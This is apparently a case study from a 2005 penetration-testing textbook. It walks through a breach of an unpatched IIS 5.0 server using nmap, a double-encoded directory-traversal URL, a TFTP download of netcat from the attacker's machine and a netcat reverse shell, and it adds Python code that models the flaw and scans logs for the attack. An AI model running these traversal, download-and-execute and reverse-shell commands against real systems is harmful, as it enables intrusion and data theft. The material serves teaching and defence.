Case Study


This case study takes several of the tools and techniques discussed in the chapter and links them into a full-blown breach of an internal network. Evil Jimmy's exploits demonstrate that web servers must be kept updated and patched, and that a firewall in front of an unpatched server changes very little.

The Little Company Network has just rebuilt the web server in its DMZ that hosts http://www.hackmynetwork.com. It has configured the Cisco PIX Firewall to statically map port 80 from the Internet to the internal web server and to block all other inbound access. The network administrators have been under pressure from management and customers, so they have not yet been able to apply service packs or security hardening to the Windows 2000 IIS server. They believe that because the server sits behind a firewall, attacks will be stopped and they will be safe until they get a chance to install the service packs and properly lock down the server. Three days later, that optimism proves unfounded when Evil Jimmy gets his hands on the server. Figure 7-39 displays the network used in this case study.

Figure 7-39. Sample Network


Evil Jimmy is out to prove a point to his hacking buddies: that he can hack an IIS 5.0 web server in less than five minutes. His first task is to find a nice easy target system, and that is where http://www.hackmynetwork.com comes into play. He starts the clock at 23:47.

Step 1.

To start, Evil Jimmy port scans the http://www.hackmynetwork.com IP address using NMap to look for open ports. He uses the -sT switch (a full TCP connect scan, so any port reported open has actually completed the three-way handshake), limits the range to the first 100 ports with -p 1-100 to keep the scan short and less conspicuous, and adds -O to attempt operating system fingerprinting. The command and output returned are as follows:

C:\>nmap -sT -O -p 1-100 -vv www.hackmynetwork.com

Starting nmap 3.81 ( http://www.insecure.org/nmap ) at 2005-03-25 23:47 GMT Standard Time
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap finished: 1 IP address (0 hosts up) scanned in 2.244 seconds
               Raw packets sent: 4 (136B) | Rcvd: 0 (0B)

C:\>

As Jimmy reviews the results returned from NMap, he sees that it reports the host as down. That is not actually true; NMap decided the host was down only because its ping probes went unanswered, so a filtering device that drops ICMP echo requests must be in the path. He tries again with the -P0 switch (called -Pn in later NMap releases), which skips the host discovery step and scans the target whether or not it answers a ping. The output returned is as follows:

C:\>nmap -sT -O -p 1-100 -vv www.hackmynetwork.com -P0

Starting nmap 3.81 ( http://www.insecure.org/nmap ) at 2005-03-25 23:47 GMT Standard Time
Initiating Connect() Scan against www.hackmynetwork.com (172.16.0.2) [100 ports] at 23:47
Discovered open port 80/tcp on 172.16.0.2
The Connect() Scan took 22.15s to scan 100 total ports.
For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
For OSScan assuming port 80 is open, 1 is closed, and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Host www.hackmynetwork.com (172.16.0.2) appears to be up ... good.
Interesting ports on www.hackmynetwork.com (172.16.0.2):
(The 99 ports scanned but not shown below are in state: closed)
PORT    STATE SERVICE
80/tcp  open  http
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SInfo(V=3.81%P=i686-pc-windows-windows%D=3/26%Tm=424523E5%O=80%C=1)
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)

Nmap finished: 1 IP address (1 host up) scanned in 73.335 seconds
               Raw packets sent: 60 (3600B) | Rcvd: 0 (0B)

C:\>

That is better. From the NMap output, Jimmy finds that port 80 is the only open port in the range. He also notices that OS fingerprinting failed: every probe in the fingerprint (T1 through T7 and PU) shows Resp=N, meaning the firewall answered none of the crafted packets, so NMap had nothing to match against its fingerprint database.

Step 2.

Seeing that NMap's ping and OS fingerprinting probes were all swallowed, Evil Jimmy deduces that a firewall is in place, passing only port 80. So instead he falls back on banner grabbing to find out what kind of web server is behind the firewall. Using NetCat to connect directly to port 80, he sends a deliberately malformed HTTP request ("GET test", with no protocol version); a server that rejects the request still identifies itself in the Server header of its error response. The syntax and returned result are as follows:

C:\>nc -vv www.hackmynetwork.com 80
www.hackmynetwork.com [172.16.0.2] 80 (http) open
GET test

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 25 Mar 2005 23:49:30 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>sent 9, rcvd 224: NOTSOCK

C:\>

From the first two steps, Jimmy is fairly certain that http://www.hackmynetwork.com sits behind a firewall. The banner says Microsoft-IIS/5.0, and because IIS 5.0 shipped only with Windows 2000, that one header gives him the operating system that the fingerprinting scan could not. (A Server header can be edited by an administrator, so it is a strong hint rather than proof, but it is usually left at the default.) Now he starts to get excited. With all the known vulnerabilities in that version of the web server, he has a plethora of tools he can try. The time is 23:49.

Step 3.

Jimmy knows that unpatched IIS 5.0 web servers are vulnerable to directory traversal attacks, and it is worth a try to see whether this one has been patched. Using a web browser, he enters a directory traversal URL that should make the web server return a directory listing. The %255c in the path is a doubly URL-encoded backslash: IIS decodes it once (to %5c) when it checks whether the path stays inside the /scripts virtual directory, and only decodes it a second time (to \) after that check, when it maps the path to disk. The ..\.. therefore climbs out of C:\inetpub\scripts into C:\winnt\system32 after the security check has already passed (this is the IIS "superfluous decoding" flaw fixed by Microsoft bulletin MS01-026). The command used within the browser is as follows:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

Figure 7-40 displays the output returned from the web server.

Figure 7-40. Directory Traversal Results


Jimmy almost falls out of his chair! This is going to be a great night! Looking over at the clock, he sees it is about 23:49. He has three minutes left.
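The following Python model shows why the %255c request gets past the server's path check when a single %5c does not. It is an added example written for this case study, not code from the book or from IIS: the order of operations (decode, check, decode again, map to disk) is a simplified model of the flaw, and the assumption that the /scripts virtual directory maps to /inetpub/scripts (written with forward slashes so posixpath works on any platform) is the author's.

```python
"""Model of the IIS 5.0 double-decoding flaw that ..%255c.. exploits.

Added example for this case study, not code from the book. The file system
layout and the order of operations inside the server are simplified
assumptions: the /scripts virtual directory is assumed to map to
/inetpub/scripts (forward slashes so posixpath can be used anywhere).
"""
from urllib.parse import unquote
import posixpath

SCRIPTS_DIR = "/inetpub/scripts"   # assumed physical path of /scripts


def to_physical(decoded_url_path):
    """Map a decoded URL path below /scripts onto the file system.

    The mapper treats "\\" like "/" and collapses "." and ".." the way a
    Windows path mapper does; that collapsing is what lets ..\\.. climb out
    of the virtual directory once the backslash is finally decoded.
    """
    stem = decoded_url_path.split("?", 1)[0]          # drop the query string
    if not stem.lower().startswith("/scripts"):
        raise ValueError("demo only models requests under /scripts")
    rel = stem[len("/scripts"):].replace("\\", "/")
    return posixpath.normpath(SCRIPTS_DIR + rel)


def inside_root(physical_path):
    return physical_path == SCRIPTS_DIR or physical_path.startswith(SCRIPTS_DIR + "/")


def serve_vulnerable(request_path):
    """Buggy order of operations: decode once, check, decode AGAIN, map.

    After one decode %255c is only %5c, an ordinary character inside a single
    path component, so the check passes. The superfluous second decode then
    turns it into "\\" and the mapper walks out of /scripts.
    """
    once = unquote(request_path)
    if not inside_root(to_physical(once)):
        return ("rejected", None)
    twice = unquote(once)                             # the superfluous decode
    return ("served", to_physical(twice))


def serve_fixed(request_path):
    """Safe order: decode to a fixed point, map, then check the physical path."""
    canon = request_path
    while (nxt := unquote(canon)) != canon:
        canon = nxt
    physical = to_physical(canon)
    if not inside_root(physical):
        return ("rejected", physical)
    return ("served", physical)


if __name__ == "__main__":
    for req in ("/scripts/hello.asp",
                "/scripts/..%5c../winnt/system32/cmd.exe",     # single encoding
                "/scripts/..%255c../winnt/system32/cmd.exe"):  # double encoding
        print(f"{req:45} vulnerable={serve_vulnerable(req)} fixed={serve_fixed(req)}")
```

The single-encoded request is rejected by both versions because one decode already exposes the backslash to the check; the double-encoded request slips through the vulnerable version and resolves to /winnt/system32/cmd.exe, while the fixed version rejects it because it canonicalizes fully before checking. The general lesson is the one the case study turns on: validate a path only after it has been decoded and canonicalized to the form the file system will actually see.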

Now that Jimmy has proven that he can run cmd.exe on the server, it is time to upload a backdoor for easier access and stop going through the web server altogether. Jimmy has selected NetCat as his backdoor of choice. His goal is to shovel cmd.exe from the web server back to his attacking computer and give himself a neat remote cmd.exe shell.

Step 4.

Evil Jimmy starts up his personal TFTP server and points it at a directory containing his hacker tools, NetCat in this particular case. Figure 7-41 shows the free Cisco TFTP server running on Evil Jimmy's computer.

Figure 7-41. Cisco TFTP Server


Step 5.

Jimmy sends a command to the web server telling it to fetch a copy of NetCat from his TFTP server and save it to its own hard drive. Windows ships a TFTP client (tftp.exe), and the -i switch selects binary (octet) transfer mode, which an executable needs to arrive intact. Following is the syntax used to accomplish this:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+172.16.0.13+GET+nc.exe

Figure 7-42 shows the activity in the TFTP server on Jimmy's computer proving that the file was actually copied. Also notice the CGI error message in the browser. This is normal: IIS ran the command as if it were a CGI program and the command produced no HTTP headers, so the web server reports an error even though the command succeeded. The transfer logged by the TFTP program is the evidence that NetCat was downloaded. Note also that the transfer worked only because the firewall let the web server open an outbound UDP connection to the Internet.

Figure 7-42. TFTP Server Activity


Step 6.

Now Jimmy needs to start a listener on his own computer to catch the remote cmd.exe shell he is about to shovel back. To do this, he uses NetCat on his personal computer to listen on port 1010 (-L, the Windows NetCat "listen harder" option, keeps the listener alive across connections). The time is 23:51.

C:\>nc -vv -L -p 1010
listening on [any] 1010 ...

Step 7.

Jimmy is almost done, but he still needs to push the cmd.exe shell from the web server across the Internet to port 1010 on his personal computer. To do this, he sends one more command via the web server telling cmd.exe to run the freshly uploaded NetCat; the -e cmd.exe option makes NetCat start cmd.exe and connect its input and output to the TCP connection back to Evil Jimmy's computer. The command used in the web browser is as follows:

http://www.hackmynetwork.com/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-e+cmd.exe+172.16.0.13+1010

Step 8.

Back on his computer, Jimmy glances over at his listening NetCat window and sees a Windows command shell banner appear. Just to make sure, he executes the hostname and ipconfig /all commands to confirm the name and IP address of the computer he is on:

C:\>nc -vv -L -p 1010
listening on [any] 1010 ...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>hostname
hostname
WEB2

c:\inetpub\scripts>ipconfig /all
ipconfig /all

Windows 2000 IP Configuration

        Host Name . . . . . . . . . . . . : WEB2
        Primary DNS Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Hybrid
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
        Physical Address. . . . . . . . . : 00-11-2F-0F-6E-DB
        DHCP Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.200.21
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.200.254
        DNS Servers . . . . . . . . . . . :

c:\inetpub\scripts>

Now Jimmy can execute commands at will on the web server through this shell, and he can copy files onto or off the server as he pleases. Notice that the server reports its own address as 192.168.200.21, not the 172.16.0.2 that NMap scanned: the PIX static translation hid the DMZ addressing from the outside, but the shell now shows Jimmy the real internal network. The time is 23:52. He has made it!
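Every step of the chain above went through IIS and therefore through the IIS log, which is where a defender would first see it. The script below is an added example written for this case study, not code from the book: it parses W3C extended log entries, fully decodes the request path so that %255c and %5c look the same, and flags traversal, double encoding, cmd.exe, tftp and "nc -e" usage. The sample log lines are constructed to mirror Jimmy's three requests; the timestamps, status codes, and the assumption that IIS logs cs-uri-stem with the encoding as received are the author's, not figures from the case study.

```python
"""Scan IIS W3C extended log lines for the request chain in this case study.

Added example, not from the book. The log lines below are constructed to
mirror the three requests Evil Jimmy sent (the field layout is the IIS 5
W3C extended format; the status codes and timestamps are invented).
"""
import re
from urllib.parse import unquote

# Constructed sample log, not real server output.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-03-25 23:49:41 172.16.0.13 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2005-03-25 23:50:12 172.16.0.13 GET /scripts/..%255c../winnt/system32/cmd.exe /c+TFTP+-i+172.16.0.13+GET+nc.exe 502
2005-03-25 23:51:30 172.16.0.13 GET /scripts/..%255c../winnt/system32/cmd.exe /c+nc+-e+cmd.exe+172.16.0.13+1010 502
2005-03-25 23:52:01 10.1.1.5 GET /default.htm - 200
"""

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")          # a ".." path component
TFTP = re.compile(r"\btftp\b", re.I)
NC_EXEC = re.compile(r"\bnc(\.exe)?\s+-e\b", re.I)   # netcat told to spawn a program


def fully_decode(s):
    """Percent-decode until nothing changes, so %255c and %5c look the same."""
    while (nxt := unquote(s)) != s:
        s = nxt
    return s


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def classify(entry):
    """Return the list of indicators found in a single log entry."""
    raw_stem = entry["cs-uri-stem"]
    stem = fully_decode(raw_stem).replace("\\", "/")
    query = fully_decode(entry["cs-uri-query"].replace("+", " "))
    findings = []
    if TRAVERSAL.search(stem):
        findings.append("traversal")
    # double encoding: a second decode still changes the string
    if unquote(unquote(raw_stem)) != unquote(raw_stem):
        findings.append("double-encoded")
    if stem.lower().endswith("/cmd.exe"):
        findings.append("cmd.exe")
    if TFTP.search(query):
        findings.append("tftp")
    if NC_EXEC.search(query):
        findings.append("netcat -e")
    return findings


def scan(text):
    """Return (time, client ip, findings) for every entry with at least one indicator."""
    hits = []
    for entry in parse_w3c(text):
        findings = classify(entry)
        if findings:
            hits.append((entry["time"], entry["c-ip"], findings))
    return hits


if __name__ == "__main__":
    for t, ip, f in scan(SAMPLE_LOG):
        print(t, ip, ", ".join(f))
```

Run against the sample, the three attack requests are flagged and the ordinary page request is not. Decoding to a fixed point matters here for the same reason it mattered to the server: a signature that looks for the literal string "..\" or "../" in the raw log line misses the %255c form entirely. Keep in mind that this only helps while the logs exist; deleting them is the first item on Jimmy's list in Step 9, which is an argument for shipping IIS logs off the box as they are written.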

Step 9.

Now that Jimmy is in the network, he has some options:

- Delete the IIS log files

- Copy the SAM database

- Copy any database that the server might contain

- Get a list of all the files and folders on the server

- Modify the website

As you can see, Evil Jimmy was able to hack into the server easily and obtain a command shell on it. The moral of the story is that the Little Company Network should not have trusted the firewall for protection. To give the PIX credit, it did block everything thrown at the server except port 80, but the application listening on that port was unpatched, and one request through the permitted port was enough to run commands on the server. Two cheap controls would have broken the chain: applying the IIS patches that were already available, and restricting outbound traffic from the DMZ, since both the TFTP download of NetCat and the reverse shell to port 1010 depended on the web server being allowed to connect out to the Internet.

    Penetration Testing and Network Defense
    ISBN: 1587052083
    Year: 2005